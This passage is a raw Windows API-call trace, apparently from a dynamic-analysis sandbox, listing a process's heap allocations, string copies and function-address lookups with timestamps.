hHeap=0x5f0000) returned 1 [0181.497] GetProcessHeap () returned 0x5f0000 [0181.497] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x625ca0 | out: hHeap=0x5f0000) returned 1 [0181.497] GetProcessHeap () returned 0x5f0000 [0181.497] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x627450 | out: hHeap=0x5f0000) returned 1 [0181.497] GetProcessHeap () returned 0x5f0000 [0181.497] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x627350 | out: hHeap=0x5f0000) returned 1 [0181.497] GetProcessHeap () returned 0x5f0000 [0181.497] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613890 | out: hHeap=0x5f0000) returned 1 [0181.497] GetProcessHeap () returned 0x5f0000 [0181.497] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613b90 | out: hHeap=0x5f0000) returned 1 [0181.498] GetProcessHeap () returned 0x5f0000 [0181.498] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6139b0 | out: hHeap=0x5f0000) returned 1 [0181.498] GetProcessHeap () returned 0x5f0000 [0181.498] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6360a0 | out: hHeap=0x5f0000) returned 1 [0181.498] GetProcessHeap () returned 0x5f0000 [0181.498] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f590 | out: hHeap=0x5f0000) returned 1 [0181.498] GetProcessHeap () returned 0x5f0000 [0181.498] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613aa0 | out: hHeap=0x5f0000) returned 1 [0181.498] GetProcessHeap () returned 0x5f0000 [0181.498] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5a0 | out: hHeap=0x5f0000) returned 1 [0181.498] GetProcessHeap () returned 0x5f0000 [0181.498] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f580 | out: hHeap=0x5f0000) returned 1 [0181.498] GetProcessHeap () returned 0x5f0000 [0181.498] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6137a0 | out: hHeap=0x5f0000) returned 1 [0181.498] GetProcessHeap () returned 0x5f0000 [0181.498] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613980 | out: hHeap=0x5f0000) returned 1 [0181.498] GetProcessHeap () returned 0x5f0000 [0181.498] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f560 | out: hHeap=0x5f0000) returned 1 [0181.498] GetProcessHeap () returned 0x5f0000 [0181.498] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f530 | out: hHeap=0x5f0000) returned 1 [0181.498] GetProcessHeap () returned 0x5f0000 [0181.498] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f550 | out: hHeap=0x5f0000) returned 1 [0181.498] GetProcessHeap () returned 0x5f0000 [0181.498] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f520 | out: hHeap=0x5f0000) returned 1 [0181.498] GetProcessHeap () returned 0x5f0000 [0181.498] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f4a0 | out: hHeap=0x5f0000) returned 1 [0181.498] GetProcessHeap () returned 0x5f0000 [0181.498] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f490 | out: hHeap=0x5f0000) returned 1 [0181.498] GetProcessHeap () returned 0x5f0000 [0181.498] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f670 | out: hHeap=0x5f0000) returned 1 [0181.498] GetProcessHeap () returned 0x5f0000 [0181.498] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f510 | out: hHeap=0x5f0000) returned 1 [0181.498] GetProcessHeap () returned 0x5f0000 [0181.498] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f540 | out: hHeap=0x5f0000) returned 1 [0181.498] GetProcessHeap () returned 0x5f0000 [0181.498] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f660 | out: hHeap=0x5f0000) returned 1 [0181.498] GetProcessHeap () returned 0x5f0000 [0181.498] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f640 | out: hHeap=0x5f0000) returned 1 [0181.499] GetProcessHeap () returned 0x5f0000 [0181.499] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f630 | out: hHeap=0x5f0000) returned 1 [0181.499] GetProcessHeap () returned 0x5f0000 [0181.499] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5b0 | out: hHeap=0x5f0000) returned 1 [0181.499] GetProcessHeap () returned 0x5f0000 [0181.499] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f620 | out: hHeap=0x5f0000) returned 1 [0181.499] GetProcessHeap () returned 0x5f0000 [0181.499] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f480 | out: hHeap=0x5f0000) returned 1 [0181.499] GetProcessHeap () returned 0x5f0000 [0181.499] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f600 | out: hHeap=0x5f0000) returned 1 [0181.499] GetProcessHeap () returned 0x5f0000 [0181.499] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x636160 | out: hHeap=0x5f0000) returned 1 [0181.499] GetProcessHeap () returned 0x5f0000 [0181.499] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613770 | out: hHeap=0x5f0000) returned 1 [0181.499] GetProcessHeap () returned 0x5f0000 [0181.499] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6273d0 | out: hHeap=0x5f0000) returned 1 [0181.499] lstrlenA (lpString="\n") returned 1 [0181.499] GetProcessHeap () returned 0x5f0000 [0181.499] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f4a0 [0181.499] lstrcpyA (in: lpString1=0x61f4a0, lpString2="\n" | out: lpString1="\n") returned="\n" [0181.499] lstrlenA (lpString="\n") returned 1 [0181.499] GetProcessHeap () returned 0x5f0000 [0181.499] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f480 [0181.499] lstrcpyA (in: lpString1=0x61f480, lpString2="\n" | out: lpString1="\n") returned="\n" [0181.499] GetProcessHeap () returned 0x5f0000 [0181.499] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f510 [0181.499] GetProcessHeap () returned 0x5f0000 [0181.499] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f520 [0181.499] GetProcessHeap () returned 0x5f0000 [0181.499] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f530 [0181.500] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.500] GetProcessHeap () returned 0x5f0000 [0181.500] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f530 | out: hHeap=0x5f0000) returned 1 [0181.500] GetProcessHeap () returned 0x5f0000 [0181.500] GetProcessHeap () returned 0x5f0000 [0181.500] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f640 [0181.500] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.500] GetProcessHeap () returned 0x5f0000 [0181.500] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f640 | out: hHeap=0x5f0000) returned 1 [0181.500] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f520, Size=0x5) returned 0x61f530 [0181.500] GetProcessHeap () returned 0x5f0000 [0181.500] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f510, Size=0x2) returned 0x61f660 [0181.500] GetProcessHeap () returned 0x5f0000 [0181.500] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f600 [0181.500] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.500] GetProcessHeap () returned 0x5f0000 [0181.500] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f600 | out: hHeap=0x5f0000) returned 1 [0181.500] GetProcessHeap () returned 0x5f0000 [0181.500] GetProcessHeap () returned 0x5f0000 [0181.500] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f600 [0181.500] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.500] GetProcessHeap () returned 0x5f0000 [0181.500] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f600 | out: hHeap=0x5f0000) returned 1 [0181.500] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f530, Size=0x9) returned 0x61f590 [0181.500] GetProcessHeap () returned 0x5f0000 [0181.500] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f4a0 | out: hHeap=0x5f0000) returned 1 [0181.500] GetProcessHeap () returned 0x5f0000 [0181.500] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f480 | out: hHeap=0x5f0000) returned 1 [0181.501] lstrlenA (lpString="/") returned 1 [0181.501] GetProcessHeap () returned 0x5f0000 [0181.501] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f480 [0181.501] lstrcpyA (in: lpString1=0x61f480, lpString2="/" | out: lpString1="/") returned="/" [0181.501] lstrlenA (lpString="") returned 0 [0181.501] GetProcessHeap () returned 0x5f0000 [0181.501] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f580 [0181.501] lstrcpyA (in: lpString1=0x61f580, lpString2="" | out: lpString1="") returned="" [0181.501] lstrlenA (lpString="") returned 0 [0181.501] GetProcessHeap () returned 0x5f0000 [0181.501] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f600 [0181.501] lstrcpyA (in: lpString1=0x61f600, lpString2="" | out: lpString1="") returned="" [0181.501] lstrlenA (lpString="") returned 0 [0181.501] GetProcessHeap () returned 0x5f0000 [0181.501] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f5a0 [0181.501] lstrcpyA (in: lpString1=0x61f5a0, lpString2="" | out: lpString1="") returned="" [0181.501] GetProcessHeap () returned 0x5f0000 [0181.501] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f600 | out: hHeap=0x5f0000) returned 1 [0181.501] GetProcessHeap () returned 0x5f0000 [0181.501] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f580 | out: hHeap=0x5f0000) returned 1 [0181.501] GetProcessHeap () returned 0x5f0000 [0181.501] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f480 | out: hHeap=0x5f0000) returned 1 [0181.501] lstrlenA (lpString="") returned 0 [0181.501] GetProcessHeap () returned 0x5f0000 [0181.501] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f540 [0181.501] lstrcpyA (in: lpString1=0x61f540, lpString2="" | out: lpString1="") returned="" [0181.501] lstrlenA (lpString="") returned 0 [0181.501] GetProcessHeap () returned 0x5f0000 [0181.501] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f5c0 [0181.501] lstrcpyA (in: lpString1=0x61f5c0, lpString2="" | out: lpString1="") returned="" [0181.501] GetProcessHeap () returned 0x5f0000 [0181.501] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f540 | out: hHeap=0x5f0000) returned 1 [0181.501] lstrlenA (lpString="\r\n") returned 2 [0181.502] GetProcessHeap () returned 0x5f0000 [0181.502] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x3) returned 0x61f510 [0181.502] lstrcpyA (in: lpString1=0x61f510, lpString2="\r\n" | out: lpString1="\r\n") returned="\r\n" [0181.502] GetProcessHeap () returned 0x5f0000 [0181.502] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f510 | out: hHeap=0x5f0000) returned 1 [0181.502] lstrlenA (lpString="||") returned 2 [0181.502] GetProcessHeap () returned 0x5f0000 [0181.502] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x3) returned 0x61f510 [0181.502] lstrcpyA (in: lpString1=0x61f510, lpString2="||" | out: lpString1="||") returned="||" [0181.502] lstrlenA (lpString="|") returned 1 [0181.502] GetProcessHeap () returned 0x5f0000 [0181.502] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f520 [0181.502] lstrcpyA (in: lpString1=0x61f520, lpString2="|" | out: lpString1="|") returned="|" [0181.502] lstrlenA (lpString="") returned 0 [0181.502] GetProcessHeap () returned 0x5f0000 [0181.502] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f530 [0181.502] lstrcpyA (in: lpString1=0x61f530, lpString2="" | out: lpString1="") returned="" [0181.502] GetProcessHeap () returned 0x5f0000 [0181.502] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x61f580 [0181.502] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="StrToInt64ExA") returned 0x7ffb262f5ce0 [0181.502] GetProcessHeap () returned 0x5f0000 [0181.502] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f580 | out: hHeap=0x5f0000) returned 1 [0181.502] StrToInt64ExA (in: pszString="", dwFlags=0x0, pllRet=0x5cf680 | out: pllRet=0x5cf680) returned 0 [0181.502] lstrlenA (lpString="") returned 0 [0181.502] GetProcessHeap () returned 0x5f0000 [0181.502] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f600 [0181.502] lstrcpyA (in: lpString1=0x61f600, lpString2="" | out: lpString1="") returned="" [0181.502] GetProcessHeap () returned 0x5f0000 [0181.502] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x61f550 [0181.503] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="StrToInt64ExA") returned 0x7ffb262f5ce0 [0181.503] GetProcessHeap () returned 0x5f0000 [0181.503] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f550 | out: hHeap=0x5f0000) returned 1 [0181.503] StrToInt64ExA (in: pszString="", dwFlags=0x0, pllRet=0x5cf680 | out: pllRet=0x5cf680) returned 0 [0181.503] lstrlenA (lpString="|") returned 1 [0181.503] GetProcessHeap () returned 0x5f0000 [0181.503] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f5b0 [0181.503] lstrcpyA (in: lpString1=0x61f5b0, lpString2="|" | out: lpString1="|") returned="|" [0181.503] lstrlenA (lpString="") returned 0 [0181.503] GetProcessHeap () returned 0x5f0000 [0181.503] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f620 [0181.503] lstrcpyA (in: lpString1=0x61f620, lpString2="" | out: lpString1="") returned="" [0181.503] GetProcessHeap () returned 0x5f0000 [0181.503] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x61f540 [0181.503] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="StrToInt64ExA") returned 0x7ffb262f5ce0 [0181.503] GetProcessHeap () returned 0x5f0000 [0181.503] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f540 | out: hHeap=0x5f0000) returned 1 [0181.503] StrToInt64ExA (in: pszString="", dwFlags=0x0, pllRet=0x5cf680 | out: pllRet=0x5cf680) returned 0 [0181.503] lstrlenA (lpString="") returned 0 [0181.503] GetProcessHeap () returned 0x5f0000 [0181.503] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f630 [0181.503] lstrcpyA (in: lpString1=0x61f630, lpString2="" | out: lpString1="") returned="" [0181.503] GetProcessHeap () returned 0x5f0000 [0181.503] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x61f540 [0181.503] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="StrToInt64ExA") returned 0x7ffb262f5ce0 [0181.503] GetProcessHeap () returned 0x5f0000 [0181.503] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f540 | out: hHeap=0x5f0000) returned 1 [0181.503] StrToInt64ExA (in: pszString="", dwFlags=0x0, pllRet=0x5cf680 | out: pllRet=0x5cf680) returned 0 [0181.503] lstrlenA (lpString="|") returned 1 [0181.503] GetProcessHeap () returned 0x5f0000 [0181.504] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f640 [0181.504] lstrcpyA (in: lpString1=0x61f640, lpString2="|" | out: lpString1="|") returned="|" [0181.504] lstrlenA (lpString="|") returned 1 [0181.504] GetProcessHeap () returned 0x5f0000 [0181.504] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f670 [0181.504] lstrcpyA (in: lpString1=0x61f670, lpString2="|" | out: lpString1="|") returned="|" [0181.504] lstrlenA (lpString="|") returned 1 [0181.504] GetProcessHeap () returned 0x5f0000 [0181.504] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f480 [0181.504] lstrcpyA (in: lpString1=0x61f480, lpString2="|" | out: lpString1="|") returned="|" [0181.504] lstrlenA (lpString="|") returned 1 [0181.504] GetProcessHeap () returned 0x5f0000 [0181.504] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f560 [0181.504] lstrcpyA (in: lpString1=0x61f560, lpString2="|" | out: lpString1="|") returned="|" [0181.504] lstrlenA (lpString="|") returned 1 [0181.504] GetProcessHeap () returned 0x5f0000 [0181.504] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f490 [0181.504] lstrcpyA (in: lpString1=0x61f490, lpString2="|" | out: lpString1="|") returned="|" [0181.504] GetProcessHeap () returned 0x5f0000 [0181.504] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f4a0 [0181.504] GetProcessHeap () returned 0x5f0000 [0181.504] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f540 [0181.504] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.504] GetProcessHeap () returned 0x5f0000 [0181.504] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f540 | out: hHeap=0x5f0000) returned 1 [0181.504] GetProcessHeap () returned 0x5f0000 [0181.504] GetProcessHeap () returned 0x5f0000 [0181.504] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f540 [0181.504] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.504] GetProcessHeap () returned 0x5f0000 [0181.504] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f540 | out: hHeap=0x5f0000) returned 1 [0181.505] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f4a0, Size=0x1) returned 0x61f540 [0181.505] GetProcessHeap () returned 0x5f0000 [0181.505] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f4a0 [0181.505] GetProcessHeap () returned 0x5f0000 [0181.505] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f550 [0181.505] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.505] GetProcessHeap () returned 0x5f0000 [0181.505] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f550 | out: hHeap=0x5f0000) returned 1 [0181.505] GetProcessHeap () returned 0x5f0000 [0181.505] GetProcessHeap () returned 0x5f0000 [0181.505] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f580 [0181.505] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.505] GetProcessHeap () returned 0x5f0000 [0181.505] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f580 | out: hHeap=0x5f0000) returned 1 [0181.505] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f4a0, Size=0xb) returned 0x61f550 [0181.505] GetProcessHeap () returned 0x5f0000 [0181.505] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xb) returned 0x61f4a0 [0181.505] GetProcessHeap () returned 0x5f0000 [0181.505] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f550 | out: hHeap=0x5f0000) returned 1 [0181.505] GetProcessHeap () returned 0x5f0000 [0181.505] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f550 [0181.505] GetProcessHeap () returned 0x5f0000 [0181.505] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f580 [0181.505] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.505] GetProcessHeap () returned 0x5f0000 [0181.505] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f580 | out: hHeap=0x5f0000) returned 1 [0181.505] GetProcessHeap () returned 0x5f0000 [0181.505] GetProcessHeap () returned 0x5f0000 [0181.505] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f580 [0181.506] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.506] GetProcessHeap () returned 0x5f0000 [0181.506] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f580 | out: hHeap=0x5f0000) returned 1 [0181.506] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f550, Size=0xb) returned 0x61f580 [0181.506] GetProcessHeap () returned 0x5f0000 [0181.506] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xb) returned 0x61f550 [0181.506] GetProcessHeap () returned 0x5f0000 [0181.506] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f580 | out: hHeap=0x5f0000) returned 1 [0181.506] lstrlenA (lpString="") returned 0 [0181.506] GetProcessHeap () returned 0x5f0000 [0181.506] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f580 [0181.506] lstrcpyA (in: lpString1=0x61f580, lpString2="" | out: lpString1="") returned="" [0181.506] GetProcessHeap () returned 0x5f0000 [0181.506] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f6e0 [0181.506] GetProcessHeap () returned 0x5f0000 [0181.506] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f840 [0181.506] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.506] GetProcessHeap () returned 0x5f0000 [0181.506] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f840 | out: hHeap=0x5f0000) returned 1 [0181.506] GetProcessHeap () returned 0x5f0000 [0181.506] GetProcessHeap () returned 0x5f0000 [0181.506] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f690 [0181.506] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.506] GetProcessHeap () returned 0x5f0000 [0181.506] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f690 | out: hHeap=0x5f0000) returned 1 [0181.506] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f6e0, Size=0x1) returned 0x61f720 [0181.506] lstrlenA (lpString="") returned 0 [0181.506] GetProcessHeap () returned 0x5f0000 [0181.506] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f850 [0181.506] lstrcpyA (in: lpString1=0x61f850, lpString2="" | out: lpString1="") returned="" [0181.507] GetProcessHeap () returned 0x5f0000 [0181.507] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f7f0 [0181.507] GetProcessHeap () returned 0x5f0000 [0181.507] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f7b0 [0181.507] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.507] GetProcessHeap () returned 0x5f0000 [0181.507] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f7b0 | out: hHeap=0x5f0000) returned 1 [0181.507] GetProcessHeap () returned 0x5f0000 [0181.507] GetProcessHeap () returned 0x5f0000 [0181.507] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f830 [0181.507] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.507] GetProcessHeap () returned 0x5f0000 [0181.507] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f830 | out: hHeap=0x5f0000) returned 1 [0181.507] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f7f0, Size=0x1) returned 0x61f800 [0181.507] GetProcessHeap () returned 0x5f0000 [0181.507] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f780 [0181.507] GetProcessHeap () returned 0x5f0000 [0181.507] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f860 [0181.507] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.507] GetProcessHeap () returned 0x5f0000 [0181.507] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f860 | out: hHeap=0x5f0000) returned 1 [0181.508] GetProcessHeap () returned 0x5f0000 [0181.508] GetProcessHeap () returned 0x5f0000 [0181.508] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f830 [0181.508] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.508] GetProcessHeap () returned 0x5f0000 [0181.508] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f830 | out: hHeap=0x5f0000) returned 1 [0181.508] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f780, Size=0x1) returned 0x61f820 [0181.508] lstrlenA (lpString="IE") returned 2 [0181.508] GetProcessHeap () returned 0x5f0000 [0181.508] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x3) returned 0x61f860 [0181.508] lstrcpyA (in: lpString1=0x61f860, lpString2="IE" | out: lpString1="IE") returned="IE" [0181.508] GetProcessHeap () returned 0x5f0000 [0181.508] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x12) returned 0x636420 [0181.508] GetProcessHeap () returned 0x5f0000 [0181.508] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f870 [0181.508] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.508] GetProcessHeap () returned 0x5f0000 [0181.508] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f870 | out: hHeap=0x5f0000) returned 1 [0181.508] GetProcessHeap () returned 0x5f0000 [0181.508] GetProcessHeap () returned 0x5f0000 [0181.509] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f6b0 [0181.509] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.509] GetProcessHeap () returned 0x5f0000 [0181.509] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f6b0 | out: hHeap=0x5f0000) returned 1 [0181.509] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x636420, Size=0x11) returned 0x636320 [0181.509] GetProcessHeap () returned 0x5f0000 [0181.509] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x11) returned 0x636160 [0181.509] GetProcessHeap () returned 0x5f0000 [0181.509] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x636160, Size=0x23) returned 0x613aa0 [0181.509] GetProcessHeap () returned 0x5f0000 [0181.509] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x12) returned 0x636260 [0181.509] GetProcessHeap () returned 0x5f0000 [0181.509] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x636260, Size=0x27) returned 0x6137a0 [0181.509] GetProcessHeap () returned 0x5f0000 [0181.509] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, 